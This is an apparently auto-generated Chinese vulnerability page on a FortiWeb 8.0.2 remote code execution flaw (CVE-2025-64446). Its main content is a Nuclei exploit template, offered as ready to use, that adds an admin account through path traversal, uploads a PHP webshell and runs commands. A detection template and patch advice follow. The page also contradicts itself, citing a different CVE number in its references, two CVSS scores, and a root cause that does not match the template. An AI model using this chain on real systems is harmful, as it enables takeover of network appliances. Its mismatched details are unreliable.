[webapps] FortiWeb 8.0.2 - Remote Code Execution
CVE-2025-64446
FortiWeb 8.0.2 存在未授权远程代码执行漏洞,可导致服务器完全控制。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-64446 |
|---|---|
| 漏洞类型 | 远程代码执行 |
| 受影响版本 | FortiWeb 8.0.2 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-04-08 |
| 提交者 | Mohammed Idrees Banyamer |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
未对用户输入进行充分验证,导致攻击者可通过HTTP请求注入操作系统命令。
🎯 攻击场景
1. 攻击者向FortiWeb Web管理界面或API发送特制HTTP请求;2. 请求中包含操作系统命令;3. 由于输入验证缺失,命令被底层系统执行;4. 攻击者获得服务器shell权限。
💥 漏洞影响
攻击者可远程执行任意操作系统命令,完全控制服务器,导致数据泄露、服务中断、横向移动等。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-64446-exploit
info:
name: FortiWeb RCE Exploit - CVE-2025-64446
author: your-nuclei-author
severity: critical
description: Exploits CVE-2025-64446 in FortiWeb to achieve Remote Code Execution (RCE) via authentication bypass, path traversal, and arbitrary file upload. This exploit creates a temporary admin user, logs in, uploads a webshell, and executes a specified command.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-64444
- https://www.fortinet.com/support/psirt/FG-IR-25-64444
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2025-64446
cwe-id: CWE-306
variables:
username: "pwnedadmin"
password: "Pwned123!"
cmd: "id"
http:
- raw:
- |+
POST /api/v2.0/user/local.add HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"../../mkey": "{{username}}", "password": "{{password}}", "isadmin": "1", "status": "enable"}
- |+
POST /api/v2.0/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username": "{{username}}", "password": "{{password}}"}
- |+
POST /api/v2.0/system/maintenance/backup HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxyz
------WebKitFormBoundaryxyz
Content-Disposition: form-data; name="upload-file"; filename="pwned.dat"
Content-Type: application/octet-stream
{{base64('<?php system("' + cmd + '"); ?>')}}
------WebKitFormBoundaryxyz--
- |+
GET /pwned.dat HTTP/1.1
Host: {{Hostname}}
- |+
POST /api/v2.0/user/local.delete HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"../../mkey": "{{username}}"}
matchers:
- type: word
part: body
words:
- "uid="
- "root:"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- '([^\s]+)'
cookie-reuse: true🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-64446-detection
info:
name: FortiWeb Detection - CVE-2025-64446
author: your-nuclei-author
severity: critical
description: Detects FortiWeb management interface and version to check if vulnerable to CVE-2025-64446 (RCE via authentication bypass, path traversal, and arbitrary file upload).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-64444
- https://www.fortinet.com/support/psirt/FG-IR-25-64444
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2025-64446
cwe-id: CWE-306
http:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}/admin/"
- "{{BaseURL}}/browse.do"
- "{{BaseURL}}/login"
redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- "FortiWeb"
- "Fortinet"
- "FortiWeb-"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- 'FortiWeb(?:-([\d.]+))?'
- 'v([\d.]+)'
- 'FortiWeb\s+([\d.]+)'
internal: false
stop-at-first-match: true🛡️ 修复建议
更新至FortiWeb 8.0.2以上补丁版本;临时措施为限制管理界面对外暴露、使用WAF规则过滤已知命令注入Payload。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 07:26 | 来源: Exploit-DB